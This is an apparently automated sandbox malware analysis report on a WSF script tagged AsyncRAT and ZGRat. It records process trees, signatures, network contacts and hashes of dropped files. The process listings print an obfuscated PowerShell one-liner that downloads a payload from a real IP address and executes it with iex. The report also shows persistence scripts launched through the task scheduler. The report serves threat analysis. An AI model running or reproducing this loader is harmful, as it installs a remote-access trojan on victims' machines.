Malware Analysis Report

2025-06-16 02:15

Sample ID 240123-pny8wsaahl
Target f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1)
SHA256 f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Tags
zgrat rat asyncrat default
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

Threat Level: Known bad

The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1) was found to be: Known bad.

Malicious Activity Summary

zgrat rat asyncrat default

AsyncRat

ZGRat

Detect ZGRat V1

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-23 12:29

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-23 12:29

Reported

2024-01-23 12:31

Platform

win7-20231215-en

Max time kernel

145s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex

C:\Windows\system32\taskeng.exe

taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\hich.bat" "

Network

Country Destination Domain Proto
FR 185.81.157.103:80 185.81.157.103 tcp
FR 185.81.157.103:80 185.81.157.103 tcp

Files

memory/2744-7-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

memory/2744-9-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

memory/2744-10-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-8-0x0000000002570000-0x0000000002578000-memory.dmp

memory/2744-11-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

memory/2744-12-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-13-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-14-0x0000000002960000-0x00000000029E0000-memory.dmp

memory/2744-18-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 25af3af8f786943d78326df1a84fd5df
SHA1 331aa1b11635d06c4ab3e292139e134c3f907113
SHA256 6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a
SHA512 d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp

MD5 ce37b88de003d46be6fb52b722efd721
SHA1 9817eb666450d67d8d1a96ba8d99b760132bc856
SHA256 a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1
SHA512 f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada

memory/1316-28-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

memory/1316-29-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-27-0x00000000025E0000-0x00000000025E8000-memory.dmp

memory/1316-26-0x000000001B200000-0x000000001B4E2000-memory.dmp

memory/1316-30-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

memory/1316-33-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-32-0x0000000002450000-0x00000000024D0000-memory.dmp

C:\Users\Public\hich.ps1

MD5 b13a273e32d5763a07d712e5209055fa
SHA1 633dd0e5f647fee13536f74247159cdb07d72273
SHA256 2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486
SHA512 8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908

memory/1316-31-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp

memory/1316-36-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1316-37-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-23 12:29

Reported

2024-01-23 12:31

Platform

win10v2004-20231215-en

Max time kernel

143s

Max time network

147s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4216 set thread context of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4728 wrote to memory of 3004 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4728 wrote to memory of 3004 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4564 wrote to memory of 2528 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4564 wrote to memory of 2528 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 2528 wrote to memory of 4216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2528 wrote to memory of 4216 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4216 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 2900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4216 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJ